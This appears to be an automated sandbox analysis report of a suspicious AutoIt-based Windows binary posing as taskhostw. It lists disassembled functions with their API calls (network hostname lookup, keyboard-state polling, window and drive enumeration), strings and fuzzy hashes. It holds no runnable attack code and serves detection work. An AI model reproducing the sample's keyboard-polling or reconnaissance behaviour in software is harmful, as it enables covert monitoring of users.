String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: a5858c9fbaec016caf0e4a015d12e1ef7fc4394c82e5712b313c8a6b717e8cd9
Instruction ID: 24f6d2a4247bde94a85efa8ec9cdd2f0eca96de6f75c5c4f968327d4dcdb0850
Opcode Fuzzy Hash: a5858c9fbaec016caf0e4a015d12e1ef7fc4394c82e5712b313c8a6b717e8cd9
Instruction Fuzzy Hash: C911B23195012D7DDB61B7A1DC5ADFFBA7CFB92B40F04052ABD01A20D1EE600D49D5B1

Function 00D546F8 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00D54713
gethostname.WSOCK32(?,00000100), ref: 00D5472D
gethostbyname.WSOCK32(?), ref: 00D5473A
_wcscpy.LIBCMT ref: 00D54762
_memmove.LIBCMT ref: 00D54775
inet_ntoa.WSOCK32(?), ref: 00D54780
_strcat.LIBCMT ref: 00D5478E
_wcscpy.LIBCMT ref: 00D547A5
WSACleanup.WSOCK32 ref: 00D547B3
_wcscpy.LIBCMT ref: 00D547C1

Strings

0.0.0.0, xrefs: 00D5475C

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: f69292269f496f5377d74d560f17f061eb73daeb45d275bde11711b17e08a25c
Instruction ID: 7f0b2121b10a29c078cd9c688c60ae718e53e014662194863b9950cdd3cddc5a
Opcode Fuzzy Hash: f69292269f496f5377d74d560f17f061eb73daeb45d275bde11711b17e08a25c
Instruction Fuzzy Hash: 5211F331504204BBCB24A720AC4AEEA77ACEF06716F0401B6FC08D6191FF718AC687B2

Function 00D5501C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00D55021

Part of subcall function 00D1034A: timeGetTime.WINMM ref: 00D1034E

Sleep.KERNEL32(0000000A), ref: 00D5504D
EnumThreadWindows.USER32 ref: 00D55071
FindWindowExW.USER32 ref: 00D55093
SetActiveWindow.USER32 ref: 00D550B2
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00D550C0
SendMessageW.USER32(00000010,00000000,00000000), ref: 00D550DF
Sleep.KERNEL32(000000FA), ref: 00D550EA
IsWindow.USER32 ref: 00D550F6
EndDialog.USER32 ref: 00D55107

Strings

BUTTON, xrefs: 00D55085

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: a24875e8353422993772f90691148794f24c49bbd6399013614b128944bc600f
Instruction ID: 98ba037687967914d42a15584a7d301d805632bc134d92b02414880fad9bda32
Opcode Fuzzy Hash: a24875e8353422993772f90691148794f24c49bbd6399013614b128944bc600f
Instruction Fuzzy Hash: EB216275200B04EFEF215F24FC99F253BA9EB44786B041128FD05C13B9EB65DD949671

Function 00CF3025 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 67windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32 ref: 00CF3074
RegisterClassExW.USER32(00000030), ref: 00CF309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00CF30AF
InitCommonControlsEx.COMCTL32(?), ref: 00CF30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00CF30DC
LoadIconW.USER32 ref: 00CF30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00CF3101

Strings

+, xrefs: 00CF305D
0, xrefs: 00CF3056
AutoIt v3 GUI, xrefs: 00CF3090
TaskbarCreated, xrefs: 00CF30A4

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 349b1640ae2cc34343addd8c6d01c23c84d129161fb24340592d13884b0cd90d
Instruction ID: 7ebebff102a02682d3460e142cae9dc9a8950801361c742839d90de09fe2a3e3
Opcode Fuzzy Hash: 349b1640ae2cc34343addd8c6d01c23c84d129161fb24340592d13884b0cd90d
Instruction Fuzzy Hash: 7F3106B5941309EFDB509FA4E885BCDBBF4FB08320F14462AE584E63A0E3B54585CFA1

Function 00CF3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32 ref: 00CF3074
RegisterClassExW.USER32(00000030), ref: 00CF309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00CF30AF
InitCommonControlsEx.COMCTL32(?), ref: 00CF30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00CF30DC
LoadIconW.USER32 ref: 00CF30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00CF3101

Strings

+, xrefs: 00CF305D
0, xrefs: 00CF3056
AutoIt v3 GUI, xrefs: 00CF3090
TaskbarCreated, xrefs: 00CF30A4

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: f4a86d0b2b6ad763e13a0f3022c6b014376654d1425aeba10a6c368727839431
Instruction ID: b17364aafbb5e55ff2e3def3bea92193de16fea230c204902b1e8a0e2efa3246
Opcode Fuzzy Hash: f4a86d0b2b6ad763e13a0f3022c6b014376654d1425aeba10a6c368727839431
Instruction Fuzzy Hash: 4321E4B5901318EFDB10DFA4E849B9DBBF4FB08700F00422AF915E63A0E7B145848FA5

Function 00D5034D Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00D503C8
SetKeyboardState.USER32(?), ref: 00D50433
GetAsyncKeyState.USER32 ref: 00D50453
GetKeyState.USER32(000000A0), ref: 00D5046A
GetAsyncKeyState.USER32 ref: 00D50499
GetKeyState.USER32(000000A1), ref: 00D504AA
GetAsyncKeyState.USER32 ref: 00D504D6
GetKeyState.USER32(00000011), ref: 00D504E4
GetAsyncKeyState.USER32 ref: 00D5050D
GetKeyState.USER32(00000012), ref: 00D5051B
GetAsyncKeyState.USER32 ref: 00D50544
GetKeyState.USER32(0000005B), ref: 00D50552

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 6dc7a7844e1e61ac65833d8e6ea44d3ab1a4e64c2b04f6f25979c11250a319ab
Instruction ID: 55407463ddf1877fcbc035ed4cb1ab08e5db38018e362442c8f70d65ef742b90
Opcode Fuzzy Hash: 6dc7a7844e1e61ac65833d8e6ea44d3ab1a4e64c2b04f6f25979c11250a319ab
Instruction Fuzzy Hash: 815197249087842AFF35EBB084157AEBFF49F01381F4C85999DC65A5C3DA649B8CCB71

Function 00D4C529 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00D4C545
GetWindowRect.USER32(00000000,?), ref: 00D4C557
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00D4C5B5
GetDlgItem.USER32(?,00000002), ref: 00D4C5C0
GetWindowRect.USER32(00000000,?), ref: 00D4C5D2
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00D4C626
GetDlgItem.USER32(?,000003E9), ref: 00D4C634
GetWindowRect.USER32(00000000,?), ref: 00D4C645
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00D4C688
GetDlgItem.USER32(?,000003EA), ref: 00D4C696
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00D4C6B3
InvalidateRect.USER32(?,00000000,00000001), ref: 00D4C6C0

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 70e670792457e5d96c5f13430ec059d323fd34e8c8d9d6870753612b6e9aeb38
Instruction ID: f454f9c4690d4d7fa9cc2221026f2d83a9f7eb8a8f9daa41b15450c210d46437
Opcode Fuzzy Hash: 70e670792457e5d96c5f13430ec059d323fd34e8c8d9d6870753612b6e9aeb38
Instruction Fuzzy Hash: EF513371B10305AFDB18CF69DD89AAEBBB5FB88711F14812DF519D72A0E7709D408B60

Function 00CF201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00CF1B41: InvalidateRect.USER32(?,00000000,00000001), ref: 00CF1B9A

DestroyWindow.USER32 ref: 00CF20D3
KillTimer.USER32 ref: 00CF216E
DestroyAcceleratorTable.USER32(00000000,?,00000000,?,?,?,?,00CF16CB,00000000,?,?,00CF1AE2,?,?), ref: 00D2BE26
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00CF16CB,00000000,?,?,00CF1AE2,?,?), ref: 00D2BE57
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00CF16CB,00000000,?,?,00CF1AE2,?,?), ref: 00D2BE6E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00CF16CB,00000000,?,?,00CF1AE2,?,?), ref: 00D2BE8A
DeleteObject.GDI32(00000000), ref: 00D2BE9C

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 6d6e0fa18eb693a7f16d7cc6b6c18b6844c548882c8a6e9c42daf2c3ab1c0d7f
Instruction ID: dd59300b7e3f5cc317c690fbaf679c0af4fd7e217f02fcaeead3ecc08ef0d9e6
Opcode Fuzzy Hash: 6d6e0fa18eb693a7f16d7cc6b6c18b6844c548882c8a6e9c42daf2c3ab1c0d7f
Instruction Fuzzy Hash: 3D619D35100B14DFCB399F15E948B3AB7F1FF54326F14852AE6468A664CBB1AC80DF62

Function 00CF21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00CF25DB: GetWindowLongW.USER32(?,000000EB), ref: 00CF25EC

GetSysColor.USER32(0000000F,?,?,?,?), ref: 00CF21D3

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 067df30af8f50a8a227051b3febe6dd7e47b6ff0d0f8f22c4c537065f077ed8c
Instruction ID: 3ce95266b82197128c4fe70f11092b04e8f09f84bb7ea6d7bbd6edcdcbb91d19
Opcode Fuzzy Hash: 067df30af8f50a8a227051b3febe6dd7e47b6ff0d0f8f22c4c537065f077ed8c
Instruction Fuzzy Hash: 8841C331100654DBEB255F28EC88BB93B66EB06331F684365FE65CA2E5D7318D81DB32

Function 00D5A931 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00D5A995
GetDriveTypeW.KERNEL32(00000061,00DA89A0,00000061), ref: 00D5AA5F
_wcscpy.LIBCMT ref: 00D5AA89

Strings

removable, xrefs: 00D5A9C7
fixed, xrefs: 00D5A9DD
network, xrefs: 00D5A9F3
unknown, xrefs: 00D5AA20
cdrom, xrefs: 00D5A9B1
ramdisk, xrefs: 00D5AA09
all, xrefs: 00D5A99B

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 63b6e5ef18a1ef201adb95f468127932319dbc58b4524d4ea74968e74100386a
Instruction ID: c6cd546c4c8d03055e73630b8056d7bf6c59ac67ea689e0fffb95db9b1f0fad6
Opcode Fuzzy Hash: 63b6e5ef18a1ef201adb95f468127932319dbc58b4524d4ea74968e74100386a
Instruction Fuzzy Hash: 4A518A30108311AFCB14EF18C891AAEB7A5EF85301F544A2DFD96572A2DB31D949DEB3

Function 00D77184 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D7719C
CreateMenu.USER32 ref: 00D771B7
SetMenu.USER32(?,00000000), ref: 00D771C6
GetMenuItemInfoW.USER32 ref: 00D77253
IsMenu.USER32(?), ref: 00D77269
CreatePopupMenu.USER32 ref: 00D77273
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00D772A0
DrawMenuBar.USER32 ref: 00D772A8

Strings

F, xrefs: 00D77294
0, xrefs: 00D77192

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 66254e17f9046c08624fae562da002aae294b3e9c841d6695c8ed069b7682dcd
Instruction ID: 4d50f372c0be7f888a927be476f18f68cf78605c151389730fd34ca745f24331
Opcode Fuzzy Hash: 66254e17f9046c08624fae562da002aae294b3e9c841d6695c8ed069b7682dcd
Instruction Fuzzy Hash: AA416778A04309EFDB20DF64D884A9ABBB5FF49300F144528F959A7361EB31A910CBB4

Function 00D16F80 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D16FBB

Part of subcall function 00D18CA8: __getptd_noexit.LIBCMT ref: 00D18CA8

__gmtime64_s.LIBCMT ref: 00D17054
__gmtime64_s.LIBCMT ref: 00D1708A
__gmtime64_s.LIBCMT ref: 00D170A7
__allrem.LIBCMT ref: 00D170FD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D17119
__allrem.LIBCMT ref: 00D17130
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D1714E
__allrem.LIBCMT ref: 00D17165
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D17183
__invoke_watson.LIBCMT ref: 00D171F4

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction ID: 4a14d534005f435229363043d8b4aca2320ceeaabc4607e0109ea583685d06a3
Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction Fuzzy Hash: 3171D471A44716BBE7149E69EC41BDAB3B8EF54324F144229F814D7291EF74DA808BB0

Function 02AA6380 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 02AA63BB

Part of subcall function 02AA80A8: __getptd_noexit.LIBCMT ref: 02AA80A8

__gmtime64_s.LIBCMT ref: 02AA6454
__gmtime64_s.LIBCMT ref: 02AA648A
__gmtime64_s.LIBCMT ref: 02AA64A7
__allrem.LIBCMT ref: 02AA64FD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02AA6519
__allrem.LIBCMT ref: 02AA6530
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02AA654E
__allrem.LIBCMT ref: 02AA6565
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02AA6583
__invoke_watson.LIBCMT ref: 02AA65F4

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1c4455a8cabbafb8053031da4900f27aa4d22a0464a805da282a5d848683b4d7
Instruction ID: 596314c8c05dacc16e1c25e3adcb6c1c4bb02c360235896a45e5b729aaa93b7f
Opcode Fuzzy Hash: 1c4455a8cabbafb8053031da4900f27aa4d22a0464a805da282a5d848683b4d7
Instruction Fuzzy Hash: 37711871A40717ABEF149F79CD91BAAB3ADAF14B24F18427AE510D7280EF70D9408F90

Function 00D5281F Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D5283A
GetMenuItemInfoW.USER32 ref: 00D5289B
SetMenuItemInfoW.USER32 ref: 00D528D1
Sleep.KERNEL32(000001F4), ref: 00D528E3
GetMenuItemCount.USER32(?), ref: 00D52927
GetMenuItemID.USER32(?,00000000), ref: 00D52943
GetMenuItemID.USER32(?,-00000001), ref: 00D5296D
GetMenuItemID.USER32(?,?), ref: 00D529B2
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00D529F8
GetMenuItemInfoW.USER32 ref: 00D52A0C
SetMenuItemInfoW.USER32 ref: 00D52A2D

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 7e7775c44ce39281a074466f7ea987bbe1fcffb73d0573028d7d555a0bebc984
Instruction ID: b06cd7052a0653e07f9a2d3ed1003c8a54e3d92e80173217263943e6d3322296
Opcode Fuzzy Hash: 7e7775c44ce39281a074466f7ea987bbe1fcffb73d0573028d7d555a0bebc984
Instruction Fuzzy Hash: BE618C70900249AFDF25CFA4D888ABE7BB9EB06346F180159EC42A7351E731AD4DDB71

Function 00D76F55 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00D76FD7
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00D76FDA
GetWindowLongW.USER32(?,000000F0), ref: 00D76FFE
_memset.LIBCMT ref: 00D7700F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D77021
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00D77099

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: f86661d93e8de8847a385c6c6562c66aed9a4bb7d5188928d49876b29fdb84fe
Instruction ID: b9da900b76764dad2e47880252249d147e93437a9a3a74aca71386242f98dbb2
Opcode Fuzzy Hash: f86661d93e8de8847a385c6c6562c66aed9a4bb7d5188928d49876b29fdb84fe
Instruction Fuzzy Hash: F6617975A00208EFDB10DFA4DC81EEE77B8EB09700F14455AFA19EB2A1D771AD41DB60

Function 00D46EEE Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00D46F15
SafeArrayAllocData.OLEAUT32(?), ref: 00D46F6E
VariantInit.OLEAUT32(?), ref: 00D46F80
SafeArrayAccessData.OLEAUT32(?,?), ref: 00D46FA0
VariantCopy.OLEAUT32(?,?), ref: 00D46FF3
SafeArrayUnaccessData.OLEAUT32(?,00000002,?,?,?,?,?,?,?,00D46CA6), ref: 00D47007
VariantClear.OLEAUT32(?), ref: 00D4701C
SafeArrayDestroyData.OLEAUT32(?), ref: 00D47029
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D47032
VariantClear.OLEAUT32(?), ref: 00D47044
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D4704F

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
